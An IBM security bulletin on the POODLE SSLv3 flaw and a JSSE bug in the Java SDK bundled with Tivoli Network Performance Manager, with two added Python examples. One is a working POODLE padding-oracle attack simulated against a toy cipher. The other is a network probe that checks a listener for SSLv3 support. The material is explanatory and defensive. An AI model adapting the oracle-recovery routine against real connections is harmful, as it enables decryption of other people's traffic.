History: Jun 17, 2018 - 2:53 p.m.

Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server shipped with IBM Tivoli Network Performance Manager Wireless Platform (CVE-2014-3566 and CVE-2014-6457)

Published: 2018-06-17 14:53:40
Source: www.ibm.com

3.4 Low

CVSS3

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

Summary

There are multiple vulnerabilities in IBM® SDK Java™ Technology Edition, which is shipped with IBM WebSphere Application Server as a component of IBM Tivoli Network Performance Manager Wireless Platform. The update also includes a fix for the Padding Oracle On Downgraded Legacy Encryption (POODLE) SSLv3 vulnerability (CVE-2014-3566). These issues were disclosed as part of the IBM Java SDK updates in October 2014.

Vulnerability Details

The following vulnerabilities are addressed in the IBM® SDK Java™ Technology Edition update; WebSphere Application Server, which ships that SDK, may be vulnerable to them:

CVE ID: CVE-2014-3566

DESCRIPTION: Product could allow a remote attacker to obtain sensitive information, caused by a design error when using the SSLv3 protocol. A remote user with the ability to conduct a man-in-the-middle attack could exploit this vulnerability via a POODLE (Padding Oracle On Downgraded Legacy Encryption) attack to decrypt SSL sessions and access the plaintext of encrypted connections.

CVSS Base Score: 4.3
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/97013 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N)
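The description above says POODLE turns SSLv3's padding handling into a decryption oracle. The following simulation is an added example, not code from the bulletin or from IBM, and shows the mechanism end to end: an SSLv3-style record layer (MAC, then padding, then CBC encryption; the padding length byte is checked but the padding bytes themselves never are) and an attacker who recovers a cookie one byte per roughly 256 records by copying the target ciphertext block into the padding position. The 8-byte Feistel block cipher, the single shared key, and the sample cookie `sid=9f3c` are assumptions made for the demo. The `strict_padding` switch applies the TLS rule that every padding byte must equal the length byte; a receiver that actually enforces it gives the attacker nothing.

```python
import hashlib
import hmac
import random

BLOCK = 8      # 8-byte blocks, as with 3DES-CBC under SSLv3
MAC_LEN = 20   # HMAC-SHA1 tag
ROUNDS = 8


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(half: bytes, key: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]


def toy_encrypt_block(key: bytes, block: bytes) -> bytes:
    """Toy 8-byte Feistel cipher: an ASSUMED stand-in for the real block cipher."""
    left, right = block[:4], block[4:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _round(right, key, rnd))
    return right + left


def toy_decrypt_block(key: bytes, block: bytes) -> bytes:
    left, right = block[:4], block[4:]
    for rnd in reversed(range(ROUNDS)):
        left, right = right, _xor(left, _round(right, key, rnd))
    return right + left


def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = toy_encrypt_block(key, _xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        blk = data[i:i + BLOCK]
        out.append(_xor(toy_decrypt_block(key, blk), prev))
        prev = blk
    return b"".join(out)


def sslv3_seal(key: bytes, payload: bytes, rng: random.Random) -> bytes:
    """SSLv3 record body = payload || MAC || p arbitrary bytes || p. Returns iv || ciphertext.
    One key serves both cipher and MAC purely to keep the toy short (assumption)."""
    body = payload + hmac.new(key, payload, hashlib.sha1).digest()
    p = (-(len(body) + 1)) % BLOCK
    body += bytes(rng.randrange(256) for _ in range(p)) + bytes([p])
    iv = bytes(rng.randrange(256) for _ in range(BLOCK))
    return iv + cbc_encrypt(key, iv, body)


def sslv3_open(key: bytes, record: bytes, strict_padding: bool = False):
    """Receiver check. SSLv3 validates only the padding LENGTH byte, never the padding
    bytes: that is the oracle. strict_padding=True applies the TLS rule (every padding
    byte must equal p), which closes it. Returns the payload, or None on any failure."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    body = cbc_decrypt(key, iv, ct)
    p = body[-1]
    if p >= BLOCK:
        return None
    if strict_padding and any(b != p for b in body[-(p + 1):-1]):
        return None
    body = body[:-(p + 1)]
    payload, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, payload, hashlib.sha1).digest()):
        return None
    return payload


def poodle_recover(client, server_accepts, secret_len: int, max_tries: int = 4000):
    """client(prefix_len, suffix_len) returns a fresh record for b'A'*prefix_len || SECRET ||
    b'B'*suffix_len (the attacker steers request length, as in the browser-driven attack);
    server_accepts(record) is the oracle. Returns SECRET, or None if the oracle never accepts."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix = (BLOCK - 1 - j) % BLOCK                      # byte j becomes last in its block
        suffix = (-(prefix + secret_len + MAC_LEN)) % BLOCK   # forces a full block of padding
        target = (prefix + j) // BLOCK + 1                    # ciphertext block holding byte j (0 = IV)
        for _ in range(max_tries):
            record = client(prefix, suffix)
            blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]
            forged = b"".join(blocks[:-1] + [blocks[target]])  # padding block := target block
            if server_accepts(forged):
                # accepted <=> D(C_target)[-1] ^ C_{n-1}[-1] == BLOCK-1,
                # and P_target[-1] = D(C_target)[-1] ^ C_{target-1}[-1]
                recovered.append((BLOCK - 1) ^ blocks[-2][-1] ^ blocks[target - 1][-1])
                break
        else:
            return None
    return bytes(recovered)


SECRET = b"sid=9f3c"   # constructed sample cookie the attacker wants to read


def demo(secret: bytes = SECRET, strict_padding: bool = False, max_tries: int = 4000, seed: int = 7):
    rng = random.Random(seed)
    key = bytes(rng.randrange(256) for _ in range(16))   # session key, unknown to the attacker

    def client(prefix_len, suffix_len):
        return sslv3_seal(key, b"A" * prefix_len + secret + b"B" * suffix_len, rng)

    def server_accepts(record):
        return sslv3_open(key, record, strict_padding) is not None

    return poodle_recover(client, server_accepts, len(secret), max_tries)


if __name__ == "__main__":
    print(demo())                                     # the cookie, about 256 records per byte
    print(demo(strict_padding=True, max_tries=300))   # None: checked padding bytes give no oracle
```

The point to take from the run is the asymmetry: the attacker never sees a decryption, only accept/reject, and SSLv3's one-byte padding check is enough to leak a plaintext byte every time the forged record happens to be accepted.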

CVE ID: CVE-2014-6457

DESCRIPTION: An unspecified vulnerability related to the JSSE component has partial confidentiality impact, partial integrity impact, and no availability impact.

CVSS Base Score: 4.0
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/97148 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:H/Au:N/C:P/I:P/A:N)

Please consult the security bulletin "Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server Oct 2014 CPU" for vulnerability details.

Affected Products and Versions

| Affected Product and Version(s) | Product and Version shipped as component |
|---|---|
| Tivoli Network Performance Manager 1.4 | Bundled the Jazz for Service Management version 1.1.0.2, IBM WebSphere version 8.5.0.1 and the JRE from IBM SDK Java 2 Technology Edition Version 7. |
| Tivoli Network Performance Manager 1.3.2 | Bundled the TIP version 2.1.0.x, IBM WebSphere version 7.0.0.x and the JRE from IBM SDK Java 2 Technology Edition Version 6. |
| Tivoli Network Performance Manager 1.3.1 | Bundled the TIP version 2.1.0.x, IBM WebSphere version 7.0.0.x and the JRE from IBM SDK Java 2 Technology Edition Version 6. |

Remediation/Fixes

Upgrade your SDK to an interim fix level as determined below:
http://www-01.ibm.com/support/docview.wss?uid=swg21687740
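After the SDK is updated (or SSLv3 is otherwise disabled on the WebSphere listener), the effective check is whether the port still negotiates SSLv3 with a CBC cipher suite. The probe below is an added example, not part of the IBM bulletin: it sends a minimal SSLv3 ClientHello offering only CBC suites and classifies the first record that comes back. The host and port are whatever listener you are checking (assumption), and the two sample replies at the bottom are constructed for the offline test, not captured from any real server. A modern `openssl s_client -ssl3` often cannot do this check because current OpenSSL builds drop SSLv3 support, which is why the hello is built by hand.

```python
import socket
import struct

# CBC cipher suites only: a server that negotiates SSLv3 with one of these is exposed to
# POODLE. RC4 suites are deliberately not offered, since POODLE is a CBC padding attack.
CBC_SUITES = [0x000A, 0x002F, 0x0035]   # 3DES-EDE-CBC-SHA, AES128-CBC-SHA, AES256-CBC-SHA
SSLV3 = b"\x03\x00"


def build_sslv3_client_hello(client_random: bytes = bytes(32)) -> bytes:
    """SSLv3 ClientHello record: no session id, no extensions, null compression only."""
    assert len(client_random) == 32
    suites = b"".join(struct.pack("!H", s) for s in CBC_SUITES)
    body = (SSLV3 + client_random + b"\x00"              # client_version, random, session_id length 0
            + struct.pack("!H", len(suites)) + suites    # cipher_suites
            + b"\x01\x00")                               # compression_methods: null
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body            # HandshakeType client_hello(1)
    return b"\x16" + SSLV3 + struct.pack("!H", len(handshake)) + handshake   # ContentType handshake(22)


def classify_response(data: bytes) -> tuple:
    """Interpret the first record the server sends back to the SSLv3 ClientHello."""
    if len(data) < 5:
        return ("closed",)                      # empty reply or dropped connection: SSLv3 refused
    content_type = data[0]
    if content_type == 0x15 and len(data) >= 7:                          # alert
        return ("alert", data[5], data[6])                               # level, description
    if content_type == 0x16 and len(data) >= 11 and data[5] == 0x02:     # handshake: server_hello
        server_version = data[9:11]
        suite = None
        if len(data) > 43:                      # 5 record + 4 handshake + 2 version + 32 random
            sid_len = data[43]
            if len(data) >= 46 + sid_len:
                suite = data[44 + sid_len:46 + sid_len].hex()
        if server_version == SSLV3:
            return ("sslv3", suite)             # SSLv3 accepted with this (CBC) suite: exposed
        return ("other_version", server_version.hex(), suite)
    return ("unexpected", content_type)


def probe(host: str, port: int = 443, timeout: float = 5.0) -> tuple:
    """Send the ClientHello to a live listener and classify the reply (network I/O)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            data = sock.recv(4096)
        except OSError:                         # timeout or reset: treat as refused
            data = b""
    return classify_response(data)


# Constructed sample replies (not captured from any real host):
SAMPLE_SSLV3_SERVER_HELLO = (b"\x16\x03\x00\x00\x2a"        # record: handshake, SSLv3, 42 bytes
                             + b"\x02\x00\x00\x26"          # server_hello, 38 bytes
                             + SSLV3 + bytes(32) + b"\x00"  # version, random, session_id length 0
                             + b"\x00\x0a\x00")             # TLS_RSA_WITH_3DES_EDE_CBC_SHA, null compression
SAMPLE_HANDSHAKE_FAILURE = b"\x15\x03\x00\x00\x02\x02\x28"  # alert: fatal(2) handshake_failure(40)

if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 443))
```

Read the result as follows: `("sslv3", "000a")` or any other suite means the listener still speaks SSLv3 with CBC and the POODLE fix is not in effect on that port; an `("alert", 2, 40)` or `("closed",)` reply means SSLv3 was refused. Only the first record is inspected, which is enough for this yes/no question.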
